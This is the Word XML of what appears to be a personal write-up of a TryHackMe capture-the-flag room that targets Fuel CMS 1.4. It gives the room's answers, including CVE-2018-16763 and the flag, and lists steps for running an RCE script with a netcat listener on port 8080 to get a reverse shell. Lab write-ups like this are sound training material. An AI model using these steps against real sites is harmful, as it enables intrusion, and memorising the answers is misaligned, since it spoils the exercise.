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E889" w14:textId="0778E20A" w:rsidR="00E7094F" w:rsidRDefault="00E7094F">
      <w:r>
        <w:t>Vulnerability Capstone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F3D29" w14:textId="565DF001" w:rsidR="00E7094F" w:rsidRDefault="00E7094F">
      <w:r w:rsidRPr="00E7094F">
        <w:t>What is the name of the application running on the vulnerable machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA319E3" w14:textId="28A00DE4" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>Ans: Fuel CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338FAEEA" w14:textId="60519286" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00E7094F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346F0987" wp14:editId="40A9AF0B">
            <wp:extent cx="5731510" cy="2821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E7FE" w14:textId="77777777" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F"/>
    <w:p w14:paraId="1796A2DE" w14:textId="2AE4BC8A" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>What is the version number of this application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353730B8" w14:textId="1B022431" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>Ans: 1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026F9C3" w14:textId="27D84CE1" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00E7094F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="300A2077" wp14:editId="4586D6F4">
            <wp:extent cx="5731510" cy="22663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C78E" w14:textId="77777777" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F"/>
    <w:p w14:paraId="4063601C" w14:textId="60F11A64" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>What is the number of the CVE that allows an attacker to remotely execute code on this application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C419D82" w14:textId="3F6AE9D7" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>Format: CVE-XXXX-XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D371C11" w14:textId="4C849DF5" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7094F">
        <w:t>CVE-2018-16763</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E181C6" w14:textId="7DBD60DE" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00E7094F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653A27FF" wp14:editId="3B8FD761">
            <wp:extent cx="5731510" cy="17449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F75B" w14:textId="7A47FB31" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F"/>
    <w:p w14:paraId="663C808E" w14:textId="77777777" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F"/>
    <w:p w14:paraId="38491367" w14:textId="3A1CB342" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2875C" w14:textId="63C427D8" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7094F">
        <w:t>THM{ACKME_BLOG_HACKED}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263DFAF" w14:textId="77777777" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F"/>
    <w:p w14:paraId="360A85C4" w14:textId="01DEB34C" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t xml:space="preserve">Step1: Download the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC544CE" w14:textId="7B2A427D" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00E7094F">
        <w:t>Fuel_CMS_RCE.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B74715" w14:textId="1B001147" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t>Step2: python3 &lt;payload file&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; &lt;your local machine IP&gt; 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215859B" w14:textId="52C9F6BC" w:rsidR="00E7094F" w:rsidRDefault="00170898" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00170898">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290B6796" wp14:editId="35919E70">
            <wp:extent cx="5425910" cy="30482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6546" w14:textId="53C221C4" w:rsidR="00E7094F" w:rsidRDefault="00E7094F" w:rsidP="00E7094F">
      <w:r>
        <w:t xml:space="preserve">Step3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5DC94B" w14:textId="44A70E61" w:rsidR="00170898" w:rsidRDefault="00170898" w:rsidP="00E7094F">
      <w:r>
        <w:t>Step4: once connected ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F274E" w14:textId="26376D01" w:rsidR="00170898" w:rsidRDefault="00170898" w:rsidP="00E7094F">
      <w:r>
        <w:t>Step 5: cd /home/ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C3079" w14:textId="0F4FE6A5" w:rsidR="00170898" w:rsidRDefault="00170898" w:rsidP="00E7094F">
      <w:r>
        <w:t>Step5: cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658AAFD" w14:textId="20687F61" w:rsidR="00E7094F" w:rsidRDefault="00170898" w:rsidP="00E7094F">
      <w:r w:rsidRPr="00170898">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63EB6841" wp14:editId="590B7268">
            <wp:extent cx="5326842" cy="278916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4F"/>
    <w:rsid w:val="00170898"/>
    <w:rsid w:val="00E7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0866"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C2F9B7D4-7419-44BF-829D-C60BE0FA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S K</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vinayak S K</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-21T15:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-21T16:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>